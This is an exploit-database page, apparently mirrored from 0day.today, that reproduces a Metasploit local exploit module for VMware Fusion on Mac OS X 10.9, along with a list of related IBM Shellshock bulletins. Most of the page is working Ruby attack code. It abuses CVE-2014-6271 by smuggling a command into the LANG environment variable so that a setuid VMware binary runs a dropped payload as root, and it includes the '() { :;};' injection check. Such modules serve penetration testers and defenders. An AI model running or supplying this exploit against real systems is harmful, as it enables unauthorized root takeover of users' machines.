Mac OS X VMWare Fusion Root Privilege Escalation Exploit

🗓️ 25 Sep 2014 00:00:00Reported by metasploitType

zdt🔗 0day.today👁 98 Views

Mac OS X VMWare Fusion Root Privilege Escalation Exploit abusesh bash environment variables to launch suid binary in VMWare Fusion as roo

Reporter	Title	Published	Views	Family All 502
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect IBM Workload Deployer (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)	15 Jun 201807:01	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect SmartCloud Provisioning for IBM Provided Software Virtual Appliance	17 Jun 201822:30	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect IBM SmartCloud Entry Appliance (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)	19 Jul 202000:49	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect certain Brocade products that IBM resells for use with IBM BladeCenter (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)	31 Jan 201901:35	–	ibm
IBM Security Bulletins	Security Bulletins for IBM Tealeaf Customer Experience offerings	16 Jun 201819:35	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect certain IBM N Series products (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)	18 Jun 201800:08	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect IBM Smart Analytics System 5600 (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)	16 Jun 201813:58	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect IBM PureData System for Operational Analytics (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)	18 Oct 201903:50	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect IBM Flex System Manager (FSM): (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187)	31 Jan 201901:30	–	ibm
IBM Security Bulletins	Security Bulletin: UPDATE: Vulnerabilities in Bash affect AIX Toolbox for Linux Applications (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187)	15 Sep 202112:14	–	ibm

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Mac OS X VMWare Fusion Root Privilege Escalation Exploit',
      'Description'   => %q{
        This abuses the bug in bash environment variables (CVE-2014-6271) to get
        a suid binary inside of VMWare Fusion to launch our payload as root.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Stephane Chazelas', # discovered the bash bug
          'juken', # discovered the VMWare priv esc
          'joev', # msf module
          'mubix' # vmware-vmx-stats
        ],
      'References'    =>
        [
          [ 'CVE', '2014-6271' ]
        ],
      'Platform'      => 'osx',
      'Arch'          => [ ARCH_X86_64 ],
      'SessionTypes'  => [ 'shell', 'meterpreter' ],
      'Targets'       => [
        [ 'Mac OS X 10.9 Mavericks x64 (Native Payload)',
          {
            'Platform' => 'osx',
            'Arch' => ARCH_X86_64
          }
        ]
      ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Sep 24 2014'
    ))

    register_options([
      OptString.new('VMWARE_PATH', [true, "The path to VMware.app", '/Applications/VMware Fusion.app']),
    ], self.class)
  end

  def check
    check_str = Rex::Text.rand_text_alphanumeric(5)
    # ensure they are vulnerable to bash env variable bug
    if cmd_exec("env x='() { :;}; echo #{check_str}' bash -c echo").include?(check_str) &&
       cmd_exec("file '#{datastore['VMWARE_PATH']}'") !~ /cannot open/

      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
    path = '/Contents/Library/vmware-vmx-stats' # path to the suid binary

    print_status("Writing payload file as '#{payload_file}'")
    exe = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
    write_file(payload_file, exe)
    register_file_for_cleanup(payload_file)
    cmd_exec("chmod +x #{payload_file}")

    print_status("Running VMWare services...")
    cmd_exec("LANG='() { :;}; #{payload_file}' '#{datastore['VMWARE_PATH']}#{path}' /dev/random")
  end

end

#  0day.today [2018-03-05]  #

25 Sep 2014 00:00Current

1.2Low risk

Vulners AI Score1.2

EPSS0.9422

mac os x vmware fusion root privilege escalation cve-2014-6271 bash bug suid binary metasploit stephane chazelas juken joev mubix 10.9 mavericks x64 services